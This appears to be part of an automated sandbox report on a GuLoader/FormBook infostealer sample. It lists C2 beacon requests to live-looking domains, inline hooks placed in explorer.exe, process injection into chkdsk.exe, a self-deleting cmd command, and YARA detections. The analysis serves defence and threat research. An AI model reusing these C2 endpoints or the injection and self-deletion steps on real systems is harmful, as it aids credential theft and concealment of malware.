                                                                                Cache-Control: max-age=3600
                                                                                Expires: Mon, 19 Jul 2021 19:26:47 GMT
                                                                                Location: https://www.elite-automation.com/nff/?-ZgX=tR-DSFa8o&D48p=CcVDHNb77dcNdWY2oqs0Q3cJ+rSEYLRnUCyMOMN+TEyN4HUBsnEuVHzuIckGNGmzeXmd
                                                                                cf-request-id: 0b619e584b000005c437099000000001
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0gA1jtTBtmBiivH5KleXovsqEuquzZF5t08%2BQrpQ%2FWzvfMFJNX%2Fay0Cb9fWwMXX3een%2BwWUeYokO2TG4Jduc9yWhhb4eHuT3bnZoO3wCn3S0jMhB9q71Kf4TaXFcOqAmAABKV4K7TVnR3y7J9pcEY3TNGg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 67160006d94c05c4-FRA
                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
9          | 192.168.2.3 | 49766       | 45.33.252.45   | 80               | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 19, 2021 20:27:28.287453890 CEST | 6314 | OUT | GET /nff/?-ZgX=tR-DSFa8o&D48p=cRGxEbCxtxOklbCQDq2naIaOwJUFKZbTk/bYH1mjDoD5ciZshsmVa8jbK15SYwAvUHmE HTTP/1.1
                                                                                Host: www.ooweesports.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Jul 19, 2021 20:27:28.510859966 CEST | 6314 | IN | HTTP/1.1 200 OK
                                                                                Transfer-Encoding: chunked
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                X-Powered-By: Nginx
                                                                                Date: Mon, 19 Jul 2021 18:27:23 GMT
                                                                                Connection: close
                                                                                Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                                Data Ascii: 3


                                                                                HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port
Jul 19, 2021 20:22:21.737766981 CEST | 133.130.104.18 | 443 | 192.168.2.3 | 49746
Certificate chain seen in this session (leaf certificate first, then its issuing intermediate):
Subject: CN=www.kinmirai.org
Issuer: CN=GlobalSign GCC R3 DV TLS CA 2020, O=GlobalSign nv-sa, C=BE
Not Before: Tue Jun 22 20:42:45 CEST 2021
Not After: Mon Jul 26 07:45:48 CEST 2021
Subject: CN=GlobalSign GCC R3 DV TLS CA 2020, O=GlobalSign nv-sa, C=BE
Issuer: CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R3
Not Before: Tue Jul 28 02:00:00 CEST 2020
Not After: Sun Mar 18 01:00:00 CET 2029
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
JA3 SSL Client Digest: 37f463bf4616ecd445d4a1937da06e19

                                                                                Code Manipulations

                                                                                User Modules

                                                                                Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA  | INLINE    | explorer.exe
PeekMessageW  | INLINE    | explorer.exe
GetMessageW   | INLINE    | explorer.exe
GetMessageA   | INLINE    | explorer.exe

                                                                                Processes

                                                                                Process: explorer.exe, Module: user32.dll
Function Name | Hook Type | New Data
PeekMessageA  | INLINE    | 0x48 0x8B 0xB8 0x85 0x5E 0xEC
PeekMessageW  | INLINE    | 0x48 0x8B 0xB8 0x8D 0xDE 0xEC
GetMessageW   | INLINE    | 0x48 0x8B 0xB8 0x8D 0xDE 0xEC
GetMessageA   | INLINE    | 0x48 0x8B 0xB8 0x85 0x5E 0xEC

                                                                                Statistics

                                                                                Behavior


                                                                                System Behavior

                                                                                General

                                                                                Start time:20:20:39
                                                                                Start date:19/07/2021
                                                                                Path:C:\Users\user\Desktop\F63V4i8eZU.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Users\user\Desktop\F63V4i8eZU.exe'
                                                                                Imagebase:0x400000
                                                                                File size:271464 bytes
                                                                                MD5 hash:08730CDD286A4C9D46B38BB6545AC311
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:Visual Basic
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.316460586.00000000022A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                Reputation:low

                                                                                General

                                                                                Start time:20:21:30
                                                                                Start date:19/07/2021
                                                                                Path:C:\Users\user\Desktop\F63V4i8eZU.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Users\user\Desktop\F63V4i8eZU.exe'
                                                                                Imagebase:0x400000
                                                                                File size:271464 bytes
                                                                                MD5 hash:08730CDD286A4C9D46B38BB6545AC311
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                Reputation:low

                                                                                General

                                                                                Start time:20:22:25
                                                                                Start date:19/07/2021
                                                                                Path:C:\Windows\explorer.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                Imagebase:0x7ff714890000
                                                                                File size:3933184 bytes
                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                Reputation:high

                                                                                General

                                                                                Start time:20:22:42
                                                                                Start date:19/07/2021
                                                                                Path:C:\Windows\SysWOW64\chkdsk.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                                                                Imagebase:0xe30000
                                                                                File size:23040 bytes
                                                                                MD5 hash:2D5A2497CB57C374B3AE3080FF9186FB
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000001F.00000002.1285459135.0000000004FC5000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000001F.00000002.1287054375.000000000596F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                Reputation:moderate

                                                                                General

                                                                                Start time:20:22:46
                                                                                Start date:19/07/2021
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:/c del 'C:\Users\user\Desktop\F63V4i8eZU.exe'
                                                                                Imagebase:0xbd0000
                                                                                File size:232960 bytes
                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Start time:20:22:47
                                                                                Start date:19/07/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6b2800000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Disassembly

                                                                                Code Analysis
